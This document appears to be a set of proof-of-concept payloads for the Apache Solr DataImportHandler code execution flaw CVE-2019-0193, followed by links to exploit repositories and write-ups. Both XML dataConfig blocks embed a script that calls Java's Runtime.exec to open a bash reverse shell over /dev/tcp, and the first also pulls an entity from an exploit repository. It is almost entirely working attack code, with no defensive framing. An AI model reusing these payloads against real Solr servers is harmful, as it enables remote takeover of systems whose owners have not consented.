<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/9999 0>&1")));
var result = [];
while(true) {
var oneline = bufReader.readLine();
result.push( oneline );
if(!oneline) break;
}
row.put("title",result.join("\n\r"));
return row;
}
]]></script>
<document>
<entity name="entity1"
url="https://raw.githubusercontent.com/1135/solr_exploit/master/URLDataSource/demo.xml"
processor="XPathEntityProcessor"
forEach="/RDF/item"
transformer="script:poc">
<field column="title" xpath="/RDF/item/title" />
</entity>
</document>
</dataConfig>
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[ java.lang.Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/9999 0>&1");
]]></script>
<document>
<entity name="a"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:" />
</document>
</dataConfig>
https://github.com/jas502n/CVE-2019-0193
https://blog.spoock.com/2018/11/25/getshell-bypass-exec
https://mp.weixin.qq.com/s/typLOXZCev_9WH_Ux0s6oA
https://mp.weixin.qq.com/s/diF7HOf3wuSjBeoIb7qLCA
https://github.com/Imanfeng/CVE-2019-0193
https://github.com/1135/solr_exploit#%E6%A3%80%E6%B5%8B%E6%BC%8F%E6%B4%9E---exploit1